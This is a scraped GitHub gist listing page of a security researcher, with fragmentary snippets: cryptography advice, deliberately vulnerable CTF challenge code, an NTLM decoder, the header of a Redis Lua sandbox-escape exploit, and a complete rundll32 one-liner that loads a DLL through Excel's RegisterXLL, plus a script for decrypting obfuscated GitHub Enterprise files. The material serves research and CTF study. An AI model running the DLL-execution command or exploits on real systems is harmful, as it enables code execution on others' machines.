Orange Tsai orangetw
This is orange!
#!/usr/bin/env python
import web, settings
urls = (
'/uploads/(.*)', 'download',
'([a-z0-9\/]*)', 'dispatcher'
class dispatcher:
orangetw / gist:eae51418694bcb34cbf7
Created May 24, 2015 14:29
(Updated) Cryptographic Right Answers
**Encrypting data** (*Was: AES-CTR with HMAC*): Use, in order of preference: (1) The Nacl/libsodium default, (2) Chacha20-Poly1305, or (3) AES-GCM.
*You care about this if: you're hiding information from users or the network.*
All three options get you "AEAD", which is the only way you want to encrypt in 2015. Options (2) and (3) are morally the same thing: a stream cipher with a polynomial ("thermonuclear CRC") MAC. Option (2) gets there with a native stream cipher and a MAC optimized for general purpose CPUs; Poly1305 is also easier than GCM for library designers to implement safely. Option (3)'s AES-GCM is the industry standard; it's fast and usually hardware accelerated on modern processors, but has implementation safety pitfalls on platforms that aren't accelerated.
*Avoid: AES-CBC, AES-CTR by itself, block ciphers with 64-bit blocks --- most especially Blowfish, which is inexplicably popular, OFB mode. Don't ever use RC4, which is comically broken.*
**Symmetric key length** (*Was: Use 256 bit keys*
orangetw / index.php
Created October 19, 2015 07:28
HITCON CTF 2015 Quals Giraffe's Coffee
include "config.php";
mysql_connect($dbhost, $dbuser, $dbpass);
function escape($str){
$str = strtolower($str);
$str = str_replace("'", "", $str);
$str = str_replace("\\", "", $str);
orangetw / sqlpwn.php
Created September 10, 2015 13:49
AIS3 Final CTF Web
sqlpwn by orange
Don't brute force or you will be banned!
include "template.html";
orangetw / babyfirst.php
Created October 19, 2015 07:17
HITCON CTF 2015 Quals Babyfirst
$dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
if ( !file_exists($dir) )
$args = $_GET['args'];
for ( $i=0; $i<count($args); $i++ ){
orangetw /
Created November 19, 2017 19:52 — forked from nicolas-grekas/
Advanced handling of HTTP requests in PHP
orangetw /
Created May 21, 2021 09:20 — forked from aseering/
NTLM auth-string decoder
#!/usr/bin/env python
## Decodes NTLM "Authenticate" HTTP-Header blobs.
## Reads the raw blob from stdin; prints out the contained metadata.
## Supports (auto-detects) Type 1, Type 2, and Type 3 messages.
## Based on the excellent protocol description from:
## <>
## with additional detail subsequently added from the official protocol spec:
## <>
orangetw /
Created February 12, 2019 15:43 — forked from c3c/
Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Original exploit by corsix and sghctoma
## Author: @c3c
## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode
## This concept is fully explained on corsix' gist at
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system"
## This code is much the same, except the process is done using pwntools' DynELF
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version
orangetw / excel.bat
Created July 22, 2017 10:17 — forked from ryhanson/
Execute DLL via the Excel.Application object's RegisterXLL() method
REM rundll32 mshtml.dll HTA one-liner command:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
#!/usr/bin/sudo sh
## -- decrypt obfuscated GHE .rb files. 2.0.0 to 2.3.1+.
## From `strings`:
## > This obfuscation is intended to discourage GitHub Enterprise customers
## > from making modifications to the VM.
## Well, good, as long as it's not intended to discourage *me* from doing this!